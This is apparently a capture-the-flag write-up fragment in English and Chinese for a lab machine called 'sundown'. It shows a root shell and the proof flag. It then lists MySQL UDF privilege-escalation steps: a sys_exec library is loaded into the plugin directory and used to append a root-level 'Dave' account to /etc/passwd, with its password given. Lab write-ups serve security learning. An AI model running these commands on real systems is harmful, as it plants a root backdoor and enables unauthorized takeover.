nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mysql:x:0:0:MySQL Server,,,:/nonexistent:/bin/false
“Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash”
Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
carlos@sundown:/tmp$ su - Dave
Password:
root@sundown:~# id
uid=0(root) gid=0(root) groups=0(root)
root@sundown:~# cd /root
root@sundown:~# ls -alh
total 28K
drwx------ 3 root root 4.0K Aug 3 2020 .
drwxr-xr-x 18 root root 4.0K Aug 3 2020 ..
lrwxrwxrwx 1 root root 9 Aug 3 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Aug 3 2020 .local
lrwxrwxrwx 1 root root 9 Aug 3 2020 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 1.3K Aug 3 2020 proof.txt
-rw-r--r-- 1 root root 66 Aug 3 2020 .selected_editor
root@sundown:~# cat proof.txt
_____,,,\//,,\\,/,
/-- --- --- -----
///--- --- -- - ----
o////- ---- --- --
!!//o/--- -- --
o*) !///,~,,\\,\/,,/,//,,
o!*!o'(\ /\
| ! o ",) \/\ /\ / \/\
o !o! !!| \/ \/ /
( * ( o!'; |\ \ /
o o ! * !` | \ / \
o | o 'o| | : \ /
* o !*!': |o| / /
(o''| `| : / /
! *|'` \|/ \\
' !o!':\ \\ \
( ('| \ `._______/
////\\\,,\///,,,,\,/oO._* o !*!'` `.________/
---- -- ------- - -oO*OoOo (o''| /
-------- ------ 'oO*OoO!*|'o!! \
------- -- - ---- --* oO*OoO *!'| ' /
--- - ----- ---- - oO*OoO!!':o!' /
- - ----- - -- - *--oO*OoOo!` /
\\\\\,,,\\,//////,\,,\\\/,,,\,,ejm/AMC
510252fabb4b7e7dddd7373b7b3da3e8
Thanks for playing - Felipe Winsnes (@whitecr0wz)
root@sundown:~#
步骤:
use mysql;
创建新表
create table potato(line blob);
insert into potato values(load_file(‘/tmp/lib_mysqludf_sys_64.so’));
SHOW VARIABLES LIKE ‘%plugin%’;
select * from potato into dumpfile
‘/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so’;
create function sys_exec returns integer soname ‘lib_mysqludf_sys_64.so’;
select sys_exec(‘echo
“Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’);
这里用户名是Dave,密码是Password@973.
STRIVE FOR PROGRESS,NOT FOR PERFECTION
